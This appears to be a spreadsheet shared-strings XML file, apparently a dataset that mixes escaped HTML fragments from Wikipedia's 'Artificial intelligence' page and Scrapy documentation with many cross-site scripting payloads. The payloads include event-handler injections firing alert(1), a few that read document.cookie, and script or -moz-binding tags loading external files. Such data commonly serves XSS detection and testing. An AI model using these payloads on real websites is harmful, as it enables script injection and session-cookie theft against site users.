    <t xml:space="preserve">&lt;li id="cite_note-autogenerated2-398"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-autogenerated2_398-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-autogenerated2_398-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/webservice.html"&gt;Web Service&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Government </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;(&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;549–551) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onblur=alert(1) tabindex=1 id=x&gt;&lt;/kbd&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Biocybernetics" title="Biocybernetics"&gt;Biological cybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Gene_expression_programming" title="Gene expression programming"&gt;Gene expression programming &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Collect statistics about your scraping crawler.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;strike style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2020 </t>
  </si>
  <si>
    <t>&lt;plaintext onmousedown="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;noscript id=x tabindex=1 onactivate=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;584–597, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;Automated planning and scheduling &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;body id=x tabindex=1 onfocus=alert(1)&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;aside onpointerup=alert(1)&gt;XSS&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;b id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;progress onload=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onmouseover="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/AI_winter" title="AI winter"&gt;AI winter &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;animate onpointermove=alert(1)&gt;XSS&lt;/animate&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tfoot ondrop=alert(1) contenteditable&gt;drop here&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;a onpaste="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;strong id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;br oncut="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onmouseenter="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;samp onbeforecut="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;ol id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/exporters.html"&gt;&lt;span class="doc"&gt;Item Exporters</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="refbegin reflist columns references-column-width" style="-moz-column-width: 30em; -webkit-column-width: 30em; column-width: 30em;"&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onpointerover=alert(1)&gt;XSS&lt;/canvas&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=44" title="Edit section: Hospitality"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;track onmousemove="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="canonical" href="https://en.wikipedia.org/wiki/Artificial_intelligence"/&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Society_based_learning-192"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Society_based_learning_192-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1984) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;legend onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/legend&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;132–144 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;base id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/base&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;font onmousedown="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;table ondragover=alert(1) contenteditable&gt;drop here&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;article onmouseleave="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;div onpointerup=alert(1)&gt;XSS&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://discovermagazine.com/2017/april-2017/cultivating-common-sense"&gt;"Cultivating Common Sense | DiscoverMagazine.com" &lt;/a&gt;. &lt;i&gt;Discover Magazine &lt;/i&gt;. 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;24 March </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Financial+Services+Roundtable&amp;amp;rft.atitle=CTO+Corner%3A+Artificial+Intelligence+Use+in+Financial+Services+%E2%80%93+Financial+Services+Roundtable&amp;amp;rft.date=2015-04-02&amp;amp;rft_id=http%3A%2F%2Ffsroundtable.org%2Fcto-corner-artificial-intelligence-use-in-financial-services%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;tfoot onload=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;textarea ondragover=alert(1) contenteditable&gt;drop here&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;rtc id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/rtc&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup draggable="true" ondragenter="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption oncontextmenu="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;sub draggable="true" ondragleave="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;script draggable="true" ondragend="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/No_free_lunch_in_search_and_optimization" title="No free lunch in search and optimization"&gt;No free lunch in search and optimization &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;i style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;style ondblclick="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;content onmousedown="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;a onmouseover=alert(document.cookie)\&gt;xxs link\&lt;/a\&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;ul class="wy-breadcrumbs"&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;94–109, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-402"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-402"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;header onmouseleave="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1920s) &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn about the command-line tool used to manage your Scrapy project.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption draggable="true" ondrag="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onmouseenter="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;del onpointerenter=alert(1)&gt;XSS&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;menuitem id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;data onpaste="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onkeyup="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;nav onmouseleave="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;caption ondrop=alert(1) contenteditable&gt;drop here&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpaste="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI&amp;#39;s_immediate_precursors-156"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI&amp;#39;s_immediate_precursors_156-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;form onpointermove=alert(1)&gt;XSS&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;kbd id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Artificial+Intelligence+at+Edinburgh+University%3A+a+Perspective&amp;amp;rft.date=1994-11&amp;amp;rft.aulast=Howe&amp;amp;rft.aufirst=J.&amp;amp;rft_id=http%3A%2F%2Fwww.inf.ed.ac.uk%2Fabout%2FAIhistory.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;em onmouseout="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Lisp_(programming_language)" title="Lisp (programming language)"&gt;Lisp &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;body onblur=alert(1) id=x&gt;&lt;iframe id=x&gt;</t>
  </si>
  <si>
    <t>&lt;progress onmouseup="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-329"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-329"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;font onbeforecopy="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		 &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onmouseup="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;u onmouseover="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;main onpaste="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Probabilistic methods for uncertain reasoning </t>
  </si>
  <si>
    <t>&lt;shadow onmousemove="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;dl onload=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onmousedown="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;span class="commit"&gt;</t>
  </si>
  <si>
    <t>&lt;thead draggable="true" ondragenter="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;br onmousedown="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Post-process and store your scraped data.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;keygen ondrop=alert(1) contenteditable&gt;drop here&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;h3&gt;</t>
  </si>
  <si>
    <t>&lt;noframes id=x tabindex=1 onfocus=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; [&lt;a rel="nofollow" class="external text" href="//arxiv.org/archive/stat.ML"&gt;stat.ML &lt;/a&gt;]. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=preprint&amp;amp;rft.jtitle=arXiv&amp;amp;rft.atitle=Explaining+and+Harnessing+Adversarial+Examples&amp;amp;rft.date=2014&amp;amp;rft_id=info%3Aarxiv%2F1412.6572&amp;amp;rft.aulast=Goodfellow&amp;amp;rft.aufirst=Ian+J.&amp;amp;rft.au=Shlens%2C+Jonathon&amp;amp;rft.au=Szegedy%2C+Christian&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=14" title="Edit section: Approaches"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;rtc onmouseenter="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Museum_of_Applied_Arts_Exhibition_&amp;#39;&amp;#39;Uncanny_Values&amp;#39;&amp;#39;-349"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Museum_of_Applied_Arts_Exhibition_&amp;#39;&amp;#39;Uncanny_Values&amp;#39;&amp;#39;_349-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;slot onclick="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;958–960 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;tfoot id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-51"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-51"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;address onpointerleave=alert(1)&gt;XSS&lt;/address&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=the+Guardian&amp;amp;rft.atitle=Google%27s+DeepMind+makes+AI+program+that+can+learn+like+a+human&amp;amp;rft.date=2017-03-14&amp;amp;rft.aulast=Sample&amp;amp;rft.aufirst=Ian&amp;amp;rft_id=https%3A%2F%2Fwww.theguardian.com%2Fglobal%2F2017%2Fmar%2F14%2Fgoogles-deepmind-makes-ai-program-that-can-learn-like-a-human&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dd onblur=alert(1) tabindex=1 id=x&gt;&lt;/dd&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="intro/overview.html"&gt;&lt;span class="doc"&gt;Scrapy at a glance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-dechter1986-250"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-dechter1986_250-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;STYLE&gt;BODY{-moz-binding:url("http://.rocks/moz.xml#")}&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;/html</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;applet id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;source id=x tabindex=1 onactivate=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>\&lt;a onmouseover="alert(document.cookie)"\&gt;xxs link\&lt;/a\&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1931) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;code draggable="true" ondragend="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Logic-194"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Logic_194-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;image3 onpointerover=alert(1)&gt;XSS&lt;/image3&gt;</t>
  </si>
  <si>
    <t>&lt;slot onmouseout="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;li id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/dt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/K-nearest_neighbor_algorithm" class="mw-redirect" title="K-nearest neighbor algorithm"&gt;K-nearest neighbor algorithm &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;audio draggable="true" ondrag="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;plaintext onload=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Evolutionary_Computation_(journal)" title="Evolutionary Computation (journal)"&gt;Evolutionary Computation (journal) &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onbeforecut="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;a ondblclick="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>c="javascript:"</t>
  </si>
  <si>
    <t>&lt;img src=validimage.png onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Driverless_cars" class="mw-redirect" title="Driverless cars"&gt;driverless cars &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;html onmousemove="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;code style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onbeforecopy="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;title onkeyup="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;shadow ondblclick="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			Interaction</t>
  </si>
  <si>
    <t>&lt;strike onkeypress="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;tr id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Fitness_approximation" title="Fitness approximation"&gt;Fitness approximation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;img id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay onplaying=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;data onpointerout=alert(1)&gt;XSS&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;q draggable="true" ondragend="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-280"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-280"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dialog id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;s style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;textarea onload=alert(1)&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;h3  id="p-interaction-label"&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Further information: &lt;a href="/wiki/Algorithmic_bias" title="Algorithmic bias"&gt;Algorithmic bias &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Wallach, pp 37–54. </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Paul_Feyerabend" title="Paul Feyerabend"&gt;Paul Feyerabend &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;progress id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Extend Scrapy with your custom functionality&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;code onkeypress="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="navbox-abovebelow" colspan="2" style="text-align: center;"&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onmouseout="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Foundational_Questions_Institute" title="Foundational Questions Institute"&gt;Foundational Questions Institute &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpointerout=alert(1)&gt;XSS&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;pre onclick="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt;, p. 73, "[O]ne of the reasons for inventing the term "artificial intelligence" was to escape association with "cybernetics". Its concentration on analog feedback seemed misguided, and I wished to avoid having either to accept Norbert (not Robert) Wiener as a guru or having to argue with him." </t>
  </si>
  <si>
    <t>&lt;menuitem onmousemove="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;div ondblclick="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT a="&gt;" '' SRC="httx://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-hannun2014-268"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-hannun2014_268-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Robotics" title="Template:Robotics"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Robotics" title="Template talk:Robotics"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Robotics&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-370"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-370"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;datalist ondrop=alert(1) contenteditable&gt;drop here&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;dl draggable="true" ondragend="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
